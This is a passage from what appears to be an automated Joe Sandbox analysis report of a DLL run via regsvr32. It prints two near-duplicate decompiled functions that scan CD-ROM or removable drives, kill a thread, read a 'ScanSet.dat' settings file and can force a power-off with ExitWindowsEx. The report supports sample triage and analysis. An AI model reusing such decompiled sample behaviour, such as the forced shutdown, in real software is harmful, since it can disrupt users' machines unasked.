                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: /o$;c$M%$$j$k$yV$yg${T>${^$}i
                                                                                                                • API String ID: 0-1421433962
                                                                                                                • Opcode ID: 25daab60148e35e9f5fc9a52453fdee49a75672e992df344f0ea4402d3743765
                                                                                                                • Instruction ID: d571dce7c94fbd4e3708940bba9a5d126c9bb19ef796459dcc1653dbd919b2ba
                                                                                                                • Opcode Fuzzy Hash: 25daab60148e35e9f5fc9a52453fdee49a75672e992df344f0ea4402d3743765
                                                                                                                • Instruction Fuzzy Hash: CB12FC715093809FD3A8CF65C58AA8BBBF1FBD5758F108A1CE5DA86260C7B58949CF03
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000FA35 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1000FA35(void* __ebp, char _a16, int _a20, signed int _a24, int _a36, int _a40, int _a44, char _a72, char _a76, char _a88, int _a100, char _a204, char _a208, signed int _a232, intOrPtr _a236) {
				char _v0;
				CHAR* _t77;
				long _t78;
				void* _t83;
				void* _t88;
				long _t89;
				void* _t91;
				void* _t93;
				void* _t96;
				signed int _t97;
				void* _t99;

				_t89 = GetLogicalDriveStringsA(0, 0);
				_t1 = _t89 + 1; // 0x1
				_t77 = E100160EC(_t99, _t1);
				_t97 = _t96 + 4;
				_t92 = _t77;
				_t78 = GetLogicalDriveStringsA(_t89, _t77);
				_t90 = _t89 + 0xffffffff;
				_t100 = _t78 - _t89 + 0xffffffff;
				if(_t78 != _t89 + 0xffffffff) {
					E1002181C(GetLogicalDriveStringsA, _t90, _t92, _t100, 0x100587a4, 0, 0);
				} else {
					__eax = __esi;
					_t2 = __eax + 1; // 0x1
					__edx = _t2;
					do {
						__cl =  *__eax;
						__eax = __eax + 1;
						__eflags = __cl;
					} while (__cl != 0);
					__eax = __eax - __edx;
					__eflags = __eax;
					__edi = __eax;
					if(__eflags != 0) {
						__ebx = GetDriveTypeA;
						do {
							__eax = GetDriveTypeA(__esi);
							__eflags = __eax - 5;
							if(__eax == 5) {
								__ecx = __esp;
								_a20 = __esp;
								__eax = E10005030(__edx, __ebp, __esi);
								__ecx =  *0x1006f050; // 0x0
								__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
							}
							__esi =  &(__esi[__edi + 1]);
							__eax = __esi;
							__edx = __eax + 1;
							do {
								__cl =  *__eax;
								__eax = __eax + 1;
								__eflags = __cl;
							} while (__cl != 0);
							__eax = __eax - __edx;
							__eflags = __eax;
							__edi = __eax;
						} while (__eflags != 0);
					}
					__edx =  *0x1006f050; // 0x0
					__eax =  *(__edx + 0x28c);
					__edi = 0;
					__eax = TerminateThread( *(__edx + 0x28c), 0);
					__ecx =  *0x1006f050; // 0x0
					__edx =  *(__ecx + 0x20);
					SendMessageA( *(__ecx + 0x20), 0x111, 0xfff555ee, 0xf55555ee) = E1002181C(__ebx, 0, __esi, __eflags, 0x10058350, 0, 0);
					__eax =  *0x1006f050; // 0x0
					 *((intOrPtr*)(__eax + 0x10e8)) = 0;
					__ecx =  *0x1006f050; // 0x0
					 *((intOrPtr*)(__ecx + 0x10ec)) = 0;
					__edx =  *0x1006f050; // 0x0
					 *((intOrPtr*)(__edx + 0x10f0)) = 0;
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D2C4(__ecx, 0x10056948);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D2C4(__ecx, 0x10056948);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D39A(__ecx, 1);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D2C4(__ecx, 0x10056948);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D39A(__ecx, 0);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D39A(__ecx, 0);
					__ecx =  &_a76;
					__eax = E100205E2( &_a76, __eflags);
					_push(0);
					_push(0x40);
					_push("Setting\\ScanSet.dat");
					__ecx =  &_a76;
					_a208 = 6;
					__eflags = E10020A24( &_a76, __edx, __eflags);
					if(__eflags != 0) {
						__eax = _a100;
						__edx =  *(_a100 + 0x28);
						__ecx =  &_a100;
						__eax = __edx->i(0, 0, 0);
						_push(0);
						_push(0x1000);
						_push(1);
						__eax =  &_a88;
						_push( &_a88);
						__ecx =  &_a16;
						__eax = E10020058(__ebx,  &_a16, __edx, 0, __esi, __eflags);
						__eflags = _a24 & 0x00000001;
						_a204 = 7;
						if(__eflags == 0) {
							__ecx = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, 0, __esi, __eflags);
						}
						__eax = _a40;
						__ecx = _a44;
						__edx = __eax + 4;
						__eflags = __edx - __ecx;
						if(__edx > __ecx) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__ecx = _a40;
							__eax = _a36;
						}
						__eax = __eax + 4;
						__eflags = _a24 & 0x00000001;
						_a40 = __eax;
						if(__eflags == 0) {
							__eax = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
						}
						_t36 = __eax + 4; // 0x4
						__edx = _t36;
						__eflags = __edx - __ecx;
						if(__edx > __ecx) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__ecx = _a40;
							__eax = _a36;
						}
						__eax = __eax + 4;
						__eflags = _a24 & 0x00000001;
						_a40 = __eax;
						if(__eflags == 0) {
							__eax = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
						}
						_t45 = __eax + 4; // 0x4
						__edx = _t45;
						__eflags = __edx - __ecx;
						if(__edx > __ecx) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__ecx = _a40;
							__eax = _a36;
						}
						__eax = __eax + 4;
						__eflags = _a24 & 0x00000001;
						_a40 = __eax;
						if(__eflags == 0) {
							__eax = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
						}
						_t54 = __eax + 4; // 0x4
						__edx = _t54;
						__eflags = __edx - __ecx;
						if(__edx > __ecx) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__ecx = _a40;
							__eax = _a36;
						}
						__eax = __eax + 4;
						__eflags = _a24 & 0x00000001;
						_a40 = __eax;
						if(__eflags == 0) {
							__eax = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
						}
						_t63 = __eax + 4; // 0x4
						__edx = _t63;
						__eflags = __edx - __ecx;
						if(__eflags > 0) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__eax = _a36;
						}
						__esi =  *__eax;
						__eax = __eax + 4;
						__ecx =  &_v0;
						_a40 = __eax;
						__eax = E1001FEB3( &_v0, __eflags);
						__ecx =  &_a72;
						__eax = E10020580(__ebx,  &_a72);
						__eflags = __esi - __edi;
						if(__eflags == 0) {
							__eax = ExitWindowsEx(8, __edi);
						}
						__ecx =  &_v0;
						_a204 = 6;
						__eax = E1002001A(__ebx,  &_v0, __edx, __edi, __esi, __eflags);
					}
					__ecx =  &_a100;
					_a232 = 0xffffffff;
					__eax = E100206EF(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				}
				 *[fs:0x0] = _a236;
				_pop(_t91);
				_pop(_t93);
				_pop(_t83);
				return E1003B437(0, _t83, _a232 ^ _t97, _t88, _t91, _t93);
			}














                                                                                                                0x1000fa41
                                                                                                                0x1000fa43
                                                                                                                0x1000fa47
                                                                                                                0x1000fa4c
                                                                                                                0x1000fa4f
                                                                                                                0x1000fa53
                                                                                                                0x1000fa55
                                                                                                                0x1000fa58
                                                                                                                0x1000fa5a
                                                                                                                0x1000f677
                                                                                                                0x1000fa60
                                                                                                                0x1000fa60
                                                                                                                0x1000fa62
                                                                                                                0x1000fa62
                                                                                                                0x1000fa65
                                                                                                                0x1000fa65
                                                                                                                0x1000fa67
                                                                                                                0x1000fa6a
                                                                                                                0x1000fa6a
                                                                                                                0x1000fa6e
                                                                                                                0x1000fa6e
                                                                                                                0x1000fa70
                                                                                                                0x1000fa72
                                                                                                                0x1000fa78
                                                                                                                0x1000fa80
                                                                                                                0x1000fa81
                                                                                                                0x1000fa83
                                                                                                                0x1000fa86
                                                                                                                0x1000fa89
                                                                                                                0x1000fa8b
                                                                                                                0x1000fa90
                                                                                                                0x1000fa95
                                                                                                                0x1000fa9b
                                                                                                                0x1000fa9b
                                                                                                                0x1000faa0
                                                                                                                0x1000faa4
                                                                                                                0x1000faa6
                                                                                                                0x1000fab0
                                                                                                                0x1000fab0
                                                                                                                0x1000fab2
                                                                                                                0x1000fab5
                                                                                                                0x1000fab5
                                                                                                                0x1000fab9
                                                                                                                0x1000fab9
                                                                                                                0x1000fabb
                                                                                                                0x1000fabb
                                                                                                                0x1000fabf
                                                                                                                0x1000fb5f
                                                                                                                0x1000fb65
                                                                                                                0x1000fb6b
                                                                                                                0x1000fb6f
                                                                                                                0x1000fb75
                                                                                                                0x1000fb7b
                                                                                                                0x1000fb9b
                                                                                                                0x1000fba0
                                                                                                                0x1000fba5
                                                                                                                0x1000fbab
                                                                                                                0x1000fbb1
                                                                                                                0x1000fbb7
                                                                                                                0x1000fbbd
                                                                                                                0x1000fbc3
                                                                                                                0x1000fbd4
                                                                                                                0x1000fbd9
                                                                                                                0x1000fbea
                                                                                                                0x1000fbef
                                                                                                                0x1000fbfd
                                                                                                                0x1000fc02
                                                                                                                0x1000fc13
                                                                                                                0x1000fc18
                                                                                                                0x1000fc25
                                                                                                                0x1000fc2a
                                                                                                                0x1000fc37
                                                                                                                0x1000fc3c
                                                                                                                0x1000fc40
                                                                                                                0x1000fc45
                                                                                                                0x1000fc46
                                                                                                                0x1000fc48
                                                                                                                0x1000fc4d
                                                                                                                0x1000fc51
                                                                                                                0x1000fc61
                                                                                                                0x1000fc63
                                                                                                                0x1000fc69
                                                                                                                0x1000fc6d
                                                                                                                0x1000fc73
                                                                                                                0x1000fc77
                                                                                                                0x1000fc79
                                                                                                                0x1000fc7a
                                                                                                                0x1000fc7f
                                                                                                                0x1000fc81
                                                                                                                0x1000fc85
                                                                                                                0x1000fc86
                                                                                                                0x1000fc8a
                                                                                                                0x1000fc8f
                                                                                                                0x1000fc94
                                                                                                                0x1000fc9c
                                                                                                                0x1000fc9e
                                                                                                                0x1000fca2
                                                                                                                0x1000fca3
                                                                                                                0x1000fca5
                                                                                                                0x1000fca5
                                                                                                                0x1000fcaa
                                                                                                                0x1000fcae
                                                                                                                0x1000fcb2
                                                                                                                0x1000fcb5
                                                                                                                0x1000fcb7
                                                                                                                0x1000fcb9
                                                                                                                0x1000fcbb
                                                                                                                0x1000fcbf
                                                                                                                0x1000fcc3
                                                                                                                0x1000fcc8
                                                                                                                0x1000fccc
                                                                                                                0x1000fccc
                                                                                                                0x1000fcd0
                                                                                                                0x1000fcd3
                                                                                                                0x1000fcd8
                                                                                                                0x1000fcdc
                                                                                                                0x1000fcde
                                                                                                                0x1000fce2
                                                                                                                0x1000fce3
                                                                                                                0x1000fce5
                                                                                                                0x1000fce5
                                                                                                                0x1000fcea
                                                                                                                0x1000fcea
                                                                                                                0x1000fced
                                                                                                                0x1000fcef
                                                                                                                0x1000fcf1
                                                                                                                0x1000fcf3
                                                                                                                0x1000fcf7
                                                                                                                0x1000fcfb
                                                                                                                0x1000fd00
                                                                                                                0x1000fd04
                                                                                                                0x1000fd04
                                                                                                                0x1000fd08
                                                                                                                0x1000fd0b
                                                                                                                0x1000fd10
                                                                                                                0x1000fd14
                                                                                                                0x1000fd16
                                                                                                                0x1000fd1a
                                                                                                                0x1000fd1b
                                                                                                                0x1000fd1d
                                                                                                                0x1000fd1d
                                                                                                                0x1000fd22
                                                                                                                0x1000fd22
                                                                                                                0x1000fd25
                                                                                                                0x1000fd27
                                                                                                                0x1000fd29
                                                                                                                0x1000fd2b
                                                                                                                0x1000fd2f
                                                                                                                0x1000fd33
                                                                                                                0x1000fd38
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd40
                                                                                                                0x1000fd43
                                                                                                                0x1000fd48
                                                                                                                0x1000fd4c
                                                                                                                0x1000fd4e
                                                                                                                0x1000fd52
                                                                                                                0x1000fd53
                                                                                                                0x1000fd55
                                                                                                                0x1000fd55
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5d
                                                                                                                0x1000fd5f
                                                                                                                0x1000fd61
                                                                                                                0x1000fd63
                                                                                                                0x1000fd67
                                                                                                                0x1000fd6b
                                                                                                                0x1000fd70
                                                                                                                0x1000fd74
                                                                                                                0x1000fd74
                                                                                                                0x1000fd78
                                                                                                                0x1000fd7b
                                                                                                                0x1000fd80
                                                                                                                0x1000fd84
                                                                                                                0x1000fd86
                                                                                                                0x1000fd8a
                                                                                                                0x1000fd8b
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd92
                                                                                                                0x1000fd92
                                                                                                                0x1000fd95
                                                                                                                0x1000fd97
                                                                                                                0x1000fd99
                                                                                                                0x1000fd9b
                                                                                                                0x1000fd9f
                                                                                                                0x1000fda3
                                                                                                                0x1000fda8
                                                                                                                0x1000fda8
                                                                                                                0x1000fdac
                                                                                                                0x1000fdae
                                                                                                                0x1000fdb1
                                                                                                                0x1000fdb5
                                                                                                                0x1000fdb9
                                                                                                                0x1000fdbe
                                                                                                                0x1000fdc2
                                                                                                                0x1000fdc7
                                                                                                                0x1000fdc9
                                                                                                                0x1000fdce
                                                                                                                0x1000fdce
                                                                                                                0x1000fdd4
                                                                                                                0x1000fdd8
                                                                                                                0x1000fde0
                                                                                                                0x1000fde0
                                                                                                                0x1000fde5
                                                                                                                0x1000fde9
                                                                                                                0x1000fdf4
                                                                                                                0x1000fdf4
                                                                                                                0x1000fe02
                                                                                                                0x1000fe0a
                                                                                                                0x1000fe0b
                                                                                                                0x1000fe0d
                                                                                                                0x1000fe22

                                                                                                                APIs
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000FA3F
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000FA53
                                                                                                                • GetDriveTypeA.KERNEL32(00000000), ref: 1000FA81
                                                                                                                • TerminateThread.KERNEL32(?,00000000,Error in Fun_mycomputer,00000000,00000000), ref: 1000FB6F
                                                                                                                • SendMessageA.USER32 ref: 1000FB8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drive$LogicalStrings$MessageSendTerminateThreadType
                                                                                                                • String ID: Setting\ScanSet.dat
                                                                                                                • API String ID: 3133380392-908802073
                                                                                                                • Opcode ID: f002f64c9c675810ec706299cf81ac513a8b1c20879c996d3da3b3c9953051ab
                                                                                                                • Instruction ID: cfe0b056fb03637e9059dfe7cedadf3e8fedbe7a21ee81f138864888d899917b
                                                                                                                • Opcode Fuzzy Hash: f002f64c9c675810ec706299cf81ac513a8b1c20879c996d3da3b3c9953051ab
                                                                                                                • Instruction Fuzzy Hash: 4191C1752083819FE314DB60CD95FABB7E6EF84348F548A1DF6458B292DBB0E905CB12
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000FAC4 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1000FAC4(void* __ebp, char _a16, int _a20, signed int _a24, int _a36, int _a40, int _a44, char _a72, char _a76, char _a88, int _a100, char _a204, char _a208, signed int _a232, intOrPtr _a236) {
				char _v0;
				CHAR* _t76;
				long _t77;
				void* _t82;
				void* _t88;
				long _t89;
				void* _t91;
				void* _t93;
				void* _t96;
				signed int _t97;
				void* _t99;

				_t89 = GetLogicalDriveStringsA(0, 0);
				_t1 = _t89 + 1; // 0x1
				_t76 = E100160EC(_t99, _t1);
				_t97 = _t96 + 4;
				_t92 = _t76;
				_t77 = GetLogicalDriveStringsA(_t89, _t76);
				_t90 = _t89 + 0xffffffff;
				_t100 = _t77 - _t89 + 0xffffffff;
				if(_t77 != _t89 + 0xffffffff) {
					E1002181C(GetLogicalDriveStringsA, _t90, _t92, _t100, 0x100587a4, 0, 0);
				} else {
					__eax = __esi;
					_t2 = __eax + 1; // 0x1
					__edx = _t2;
					do {
						__cl =  *__eax;
						__eax = __eax + 1;
						__eflags = __cl;
					} while (__cl != 0);
					__eax = __eax - __edx;
					__eflags = __eax;
					__edi = __eax;
					if(__eflags != 0) {
						__ebx = GetDriveTypeA;
						do {
							__eax = GetDriveTypeA(__esi);
							__eflags = __eax - 2;
							if(__eax == 2) {
								__ecx = __esp;
								_a20 = __esp;
								__eax = E10005030(__edx, __ebp, __esi);
								__ecx =  *0x1006f050; // 0x0
								__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
							}
							__esi =  &(__esi[__edi + 1]);
							__eax = __esi;
							__edx = __eax + 1;
							do {
								__cl =  *__eax;
								__eax = __eax + 1;
								__eflags = __cl;
							} while (__cl != 0);
							__eax = __eax - __edx;
							__eflags = __eax;
							__edi = __eax;
						} while (__eflags != 0);
					}
					__edx =  *0x1006f050; // 0x0
					__eax =  *(__edx + 0x28c);
					__edi = 0;
					__eax = TerminateThread( *(__edx + 0x28c), 0);
					__ecx =  *0x1006f050; // 0x0
					__edx =  *(__ecx + 0x20);
					SendMessageA( *(__ecx + 0x20), 0x111, 0xfff555ee, 0xf55555ee) = E1002181C(__ebx, 0, __esi, __eflags, 0x10058350, 0, 0);
					__eax =  *0x1006f050; // 0x0
					 *((intOrPtr*)(__eax + 0x10e8)) = 0;
					__ecx =  *0x1006f050; // 0x0
					 *((intOrPtr*)(__ecx + 0x10ec)) = 0;
					__edx =  *0x1006f050; // 0x0
					 *((intOrPtr*)(__edx + 0x10f0)) = 0;
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D2C4(__ecx, 0x10056948);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D2C4(__ecx, 0x10056948);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D39A(__ecx, 1);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D2C4(__ecx, 0x10056948);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D39A(__ecx, 0);
					__ecx =  *0x1006f050; // 0x0
					__eax = E1001D39A(__ecx, 0);
					__ecx =  &_a76;
					__eax = E100205E2( &_a76, __eflags);
					_push(0);
					_push(0x40);
					_push("Setting\\ScanSet.dat");
					__ecx =  &_a76;
					_a208 = 6;
					__eflags = E10020A24( &_a76, __edx, __eflags);
					if(__eflags != 0) {
						__eax = _a100;
						__edx =  *(_a100 + 0x28);
						__ecx =  &_a100;
						__eax = __edx->i(0, 0, 0);
						_push(0);
						_push(0x1000);
						_push(1);
						__eax =  &_a88;
						_push( &_a88);
						__ecx =  &_a16;
						__eax = E10020058(__ebx,  &_a16, __edx, 0, __esi, __eflags);
						__eflags = _a24 & 0x00000001;
						_a204 = 7;
						if(__eflags == 0) {
							__ecx = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, 0, __esi, __eflags);
						}
						__eax = _a40;
						__ecx = _a44;
						__edx = __eax + 4;
						__eflags = __edx - __ecx;
						if(__edx > __ecx) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__ecx = _a40;
							__eax = _a36;
						}
						__eax = __eax + 4;
						__eflags = _a24 & 0x00000001;
						_a40 = __eax;
						if(__eflags == 0) {
							__eax = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
						}
						_t36 = __eax + 4; // 0x4
						__edx = _t36;
						__eflags = __edx - __ecx;
						if(__edx > __ecx) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__ecx = _a40;
							__eax = _a36;
						}
						__eax = __eax + 4;
						__eflags = _a24 & 0x00000001;
						_a40 = __eax;
						if(__eflags == 0) {
							__eax = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
						}
						_t45 = __eax + 4; // 0x4
						__edx = _t45;
						__eflags = __edx - __ecx;
						if(__edx > __ecx) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__ecx = _a40;
							__eax = _a36;
						}
						__eax = __eax + 4;
						__eflags = _a24 & 0x00000001;
						_a40 = __eax;
						if(__eflags == 0) {
							__eax = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
						}
						_t54 = __eax + 4; // 0x4
						__edx = _t54;
						__eflags = __edx - __ecx;
						if(__edx > __ecx) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__ecx = _a40;
							__eax = _a36;
						}
						__eax = __eax + 4;
						__eflags = _a24 & 0x00000001;
						_a40 = __eax;
						if(__eflags == 0) {
							__eax = _a20;
							_push(_a20);
							_push(4);
							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
						}
						_t63 = __eax + 4; // 0x4
						__edx = _t63;
						__eflags = __edx - __ecx;
						if(__eflags > 0) {
							__eax = __eax - __ecx;
							__eflags = __eax;
							__ecx =  &_v0;
							__eax = E1001FADC( &_v0, __edx, __eax);
							__eax = _a36;
						}
						__esi =  *__eax;
						__eax = __eax + 4;
						__ecx =  &_v0;
						_a40 = __eax;
						__eax = E1001FEB3( &_v0, __eflags);
						__ecx =  &_a72;
						__eax = E10020580(__ebx,  &_a72);
						__eflags = __esi - __edi;
						if(__eflags == 0) {
							__eax = ExitWindowsEx(8, __edi);
						}
						__ecx =  &_v0;
						_a204 = 6;
						__eax = E1002001A(__ebx,  &_v0, __edx, __edi, __esi, __eflags);
					}
					__ecx =  &_a100;
					_a232 = 0xffffffff;
					__eax = E100206EF(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				}
				 *[fs:0x0] = _a236;
				_pop(_t91);
				_pop(_t93);
				_pop(_t82);
				return E1003B437(0, _t82, _a232 ^ _t97, _t88, _t91, _t93);
			}














                                                                                                                0x1000fad0
                                                                                                                0x1000fad2
                                                                                                                0x1000fad6
                                                                                                                0x1000fadb
                                                                                                                0x1000fade
                                                                                                                0x1000fae2
                                                                                                                0x1000fae4
                                                                                                                0x1000fae7
                                                                                                                0x1000fae9
                                                                                                                0x1000f677
                                                                                                                0x1000faef
                                                                                                                0x1000faef
                                                                                                                0x1000faf1
                                                                                                                0x1000faf1
                                                                                                                0x1000faf4
                                                                                                                0x1000faf4
                                                                                                                0x1000faf6
                                                                                                                0x1000faf9
                                                                                                                0x1000faf9
                                                                                                                0x1000fafd
                                                                                                                0x1000fafd
                                                                                                                0x1000faff
                                                                                                                0x1000fb01
                                                                                                                0x1000fb03
                                                                                                                0x1000fb10
                                                                                                                0x1000fb11
                                                                                                                0x1000fb13
                                                                                                                0x1000fb16
                                                                                                                0x1000fb19
                                                                                                                0x1000fb1b
                                                                                                                0x1000fb20
                                                                                                                0x1000fb25
                                                                                                                0x1000fb2b
                                                                                                                0x1000fb2b
                                                                                                                0x1000fb30
                                                                                                                0x1000fb34
                                                                                                                0x1000fb36
                                                                                                                0x1000fb40
                                                                                                                0x1000fb40
                                                                                                                0x1000fb42
                                                                                                                0x1000fb45
                                                                                                                0x1000fb45
                                                                                                                0x1000fb49
                                                                                                                0x1000fb49
                                                                                                                0x1000fb4b
                                                                                                                0x1000fb4b
                                                                                                                0x1000fb4f
                                                                                                                0x1000fb5f
                                                                                                                0x1000fb65
                                                                                                                0x1000fb6b
                                                                                                                0x1000fb6f
                                                                                                                0x1000fb75
                                                                                                                0x1000fb7b
                                                                                                                0x1000fb9b
                                                                                                                0x1000fba0
                                                                                                                0x1000fba5
                                                                                                                0x1000fbab
                                                                                                                0x1000fbb1
                                                                                                                0x1000fbb7
                                                                                                                0x1000fbbd
                                                                                                                0x1000fbc3
                                                                                                                0x1000fbd4
                                                                                                                0x1000fbd9
                                                                                                                0x1000fbea
                                                                                                                0x1000fbef
                                                                                                                0x1000fbfd
                                                                                                                0x1000fc02
                                                                                                                0x1000fc13
                                                                                                                0x1000fc18
                                                                                                                0x1000fc25
                                                                                                                0x1000fc2a
                                                                                                                0x1000fc37
                                                                                                                0x1000fc3c
                                                                                                                0x1000fc40
                                                                                                                0x1000fc45
                                                                                                                0x1000fc46
                                                                                                                0x1000fc48
                                                                                                                0x1000fc4d
                                                                                                                0x1000fc51
                                                                                                                0x1000fc61
                                                                                                                0x1000fc63
                                                                                                                0x1000fc69
                                                                                                                0x1000fc6d
                                                                                                                0x1000fc73
                                                                                                                0x1000fc77
                                                                                                                0x1000fc79
                                                                                                                0x1000fc7a
                                                                                                                0x1000fc7f
                                                                                                                0x1000fc81
                                                                                                                0x1000fc85
                                                                                                                0x1000fc86
                                                                                                                0x1000fc8a
                                                                                                                0x1000fc8f
                                                                                                                0x1000fc94
                                                                                                                0x1000fc9c
                                                                                                                0x1000fc9e
                                                                                                                0x1000fca2
                                                                                                                0x1000fca3
                                                                                                                0x1000fca5
                                                                                                                0x1000fca5
                                                                                                                0x1000fcaa
                                                                                                                0x1000fcae
                                                                                                                0x1000fcb2
                                                                                                                0x1000fcb5
                                                                                                                0x1000fcb7
                                                                                                                0x1000fcb9
                                                                                                                0x1000fcbb
                                                                                                                0x1000fcbf
                                                                                                                0x1000fcc3
                                                                                                                0x1000fcc8
                                                                                                                0x1000fccc
                                                                                                                0x1000fccc
                                                                                                                0x1000fcd0
                                                                                                                0x1000fcd3
                                                                                                                0x1000fcd8
                                                                                                                0x1000fcdc
                                                                                                                0x1000fcde
                                                                                                                0x1000fce2
                                                                                                                0x1000fce3
                                                                                                                0x1000fce5
                                                                                                                0x1000fce5
                                                                                                                0x1000fcea
                                                                                                                0x1000fcea
                                                                                                                0x1000fced
                                                                                                                0x1000fcef
                                                                                                                0x1000fcf1
                                                                                                                0x1000fcf3
                                                                                                                0x1000fcf7
                                                                                                                0x1000fcfb
                                                                                                                0x1000fd00
                                                                                                                0x1000fd04
                                                                                                                0x1000fd04
                                                                                                                0x1000fd08
                                                                                                                0x1000fd0b
                                                                                                                0x1000fd10
                                                                                                                0x1000fd14
                                                                                                                0x1000fd16
                                                                                                                0x1000fd1a
                                                                                                                0x1000fd1b
                                                                                                                0x1000fd1d
                                                                                                                0x1000fd1d
                                                                                                                0x1000fd22
                                                                                                                0x1000fd22
                                                                                                                0x1000fd25
                                                                                                                0x1000fd27
                                                                                                                0x1000fd29
                                                                                                                0x1000fd2b
                                                                                                                0x1000fd2f
                                                                                                                0x1000fd33
                                                                                                                0x1000fd38
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd40
                                                                                                                0x1000fd43
                                                                                                                0x1000fd48
                                                                                                                0x1000fd4c
                                                                                                                0x1000fd4e
                                                                                                                0x1000fd52
                                                                                                                0x1000fd53
                                                                                                                0x1000fd55
                                                                                                                0x1000fd55
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5d
                                                                                                                0x1000fd5f
                                                                                                                0x1000fd61
                                                                                                                0x1000fd63
                                                                                                                0x1000fd67
                                                                                                                0x1000fd6b
                                                                                                                0x1000fd70
                                                                                                                0x1000fd74
                                                                                                                0x1000fd74
                                                                                                                0x1000fd78
                                                                                                                0x1000fd7b
                                                                                                                0x1000fd80
                                                                                                                0x1000fd84
                                                                                                                0x1000fd86
                                                                                                                0x1000fd8a
                                                                                                                0x1000fd8b
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd92
                                                                                                                0x1000fd92
                                                                                                                0x1000fd95
                                                                                                                0x1000fd97
                                                                                                                0x1000fd99
                                                                                                                0x1000fd9b
                                                                                                                0x1000fd9f
                                                                                                                0x1000fda3
                                                                                                                0x1000fda8
                                                                                                                0x1000fda8
                                                                                                                0x1000fdac
                                                                                                                0x1000fdae
                                                                                                                0x1000fdb1
                                                                                                                0x1000fdb5
                                                                                                                0x1000fdb9
                                                                                                                0x1000fdbe
